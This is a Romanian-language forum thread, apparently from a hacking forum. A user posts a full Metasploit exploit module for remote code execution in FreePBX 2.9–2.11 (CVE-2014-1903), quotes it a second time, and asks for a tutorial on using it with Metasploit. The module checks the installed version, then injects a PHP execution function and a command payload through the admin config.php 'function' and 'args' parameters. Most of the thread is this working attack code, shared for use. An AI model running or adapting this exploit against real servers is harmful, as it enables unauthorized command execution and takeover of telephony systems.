Jump to content
BloodLust

FreePBX vulnerabilitate 25-03-2014

Recommended Posts

Posted

am gasit asa ceva dar nu stiu cu ce se mananca mancarea asta de peste ... am posta poate pot primi un ajutor o informatie din partea voastra ..

http://www.exploit-db.com/exploits/32512/

##

# This module requires Metasploit: http//metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={})

super(update_info(info,

'Name' => "FreePBX config.php Remote Code Execution",

'Description' => %q{

This module exploits a vulnerability found in FreePBX version 2.9, 2.10, and 2.11.

It's possible to inject arbitrary PHP functions and commands in the "/admin/config.php"

parameters "function" and "args".

},

'License' => MSF_LICENSE,

'Author' =>

[

'i-Hmx', # Vulnerability discovery

'0x00string', # PoC

'xistence <xistence[at]0x90.nl>' # Metasploit module

],

'References' =>

[

['CVE', '2014-1903'],

['OSVDB', '103240'],

['EDB', '32214'],

['URL', 'http://issues.freepbx.org/browse/FREEPBX-7123']

],

'Platform' => 'unix',

'Arch' => ARCH_CMD,

'Targets' =>

[

['FreePBX', {}]

],

'Privileged' => false,

'DisclosureDate' => "Mar 21 2014",

'DefaultTarget' => 0))

register_options(

[

OptString.new('TARGETURI', [true, 'The base path to the FreePBX installation', '/'])

], self.class)

register_advanced_options(

[

OptString.new('PHPFUNC', [true, 'The PHP execution function to use', 'passthru'])

], self.class)

end

def check

vprint_status("#{peer} - Trying to detect installed version")

res = send_request_cgi({

'method' => 'GET',

'uri' => normalize_uri(target_uri.path, "admin", "CHANGES")

})

if res and res.code == 200 and res.body =~ /^(.*)$/

version = $1

else

return Exploit::CheckCode::Unknown

end

vprint_status("#{peer} - Version #{version} detected")

if version =~ /2\.(9|10|11)\.0/

return Exploit::CheckCode::Appears

else

return Exploit::CheckCode::Safe

end

end

def exploit

rand_data = rand_text_alpha_lower(rand(10) + 5)

print_status("#{peer} - Sending payload")

res = send_request_cgi({

'method' => 'GET',

'uri' => normalize_uri(target_uri.path, "admin", "config.php"),

'vars_get' => {

"display" => rand_data,

"handler" => "api",

"function" => datastore['PHPFUNC'],

"args" => payload.encoded

}

})

# If we don't get a 200 when we request our malicious payload, we suspect

# we don't have a shell, either.

if res and res.code != 200

print_error("#{peer} - Unexpected response, exploit probably failed!")

end

end

end

Posted
am gasit asa ceva dar nu stiu cu ce se mananca mancarea asta de peste ... am posta poate pot primi un ajutor o informatie din partea voastra ..

http://www.exploit-db.com/exploits/32512/

##

# This module requires Metasploit: http//metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={})

super(update_info(info,

'Name' => "FreePBX config.php Remote Code Execution",

'Description' => %q{

This module exploits a vulnerability found in FreePBX version 2.9, 2.10, and 2.11.

It's possible to inject arbitrary PHP functions and commands in the "/admin/config.php"

parameters "function" and "args".

},

'License' => MSF_LICENSE,

'Author' =>

[

'i-Hmx', # Vulnerability discovery

'0x00string', # PoC

'xistence <xistence[at]0x90.nl>' # Metasploit module

],

'References' =>

[

['CVE', '2014-1903'],

['OSVDB', '103240'],

['EDB', '32214'],

['URL', 'http://issues.freepbx.org/browse/FREEPBX-7123']

],

'Platform' => 'unix',

'Arch' => ARCH_CMD,

'Targets' =>

[

['FreePBX', {}]

],

'Privileged' => false,

'DisclosureDate' => "Mar 21 2014",

'DefaultTarget' => 0))

register_options(

[

OptString.new('TARGETURI', [true, 'The base path to the FreePBX installation', '/'])

], self.class)

register_advanced_options(

[

OptString.new('PHPFUNC', [true, 'The PHP execution function to use', 'passthru'])

], self.class)

end

def check

vprint_status("#{peer} - Trying to detect installed version")

res = send_request_cgi({

'method' => 'GET',

'uri' => normalize_uri(target_uri.path, "admin", "CHANGES")

})

if res and res.code == 200 and res.body =~ /^(.*)$/

version = $1

else

return Exploit::CheckCode::Unknown

end

vprint_status("#{peer} - Version #{version} detected")

if version =~ /2\.(9|10|11)\.0/

return Exploit::CheckCode::Appears

else

return Exploit::CheckCode::Safe

end

end

def exploit

rand_data = rand_text_alpha_lower(rand(10) + 5)

print_status("#{peer} - Sending payload")

res = send_request_cgi({

'method' => 'GET',

'uri' => normalize_uri(target_uri.path, "admin", "config.php"),

'vars_get' => {

"display" => rand_data,

"handler" => "api",

"function" => datastore['PHPFUNC'],

"args" => payload.encoded

}

})

# If we don't get a 200 when we request our malicious payload, we suspect

# we don't have a shell, either.

if res and res.code != 200

print_error("#{peer} - Unexpected response, exploit probably failed!")

end

end

end

##

# This module requires Metasploit: http//metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

Posted (edited)

am vazut dar ma gandeam lao explicatie mai detaliata am vazut ca se foloseste cu metasploit dar cum ... e prima oara cand pun mana pe asa ceva ... adica metasploit si aceasta vulnerabilitate

as dori un tutorial ceva .. am cautat dar nam gasit .. despre asta.. am gasit cu totul altceva ..

Edited by BloodLust

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...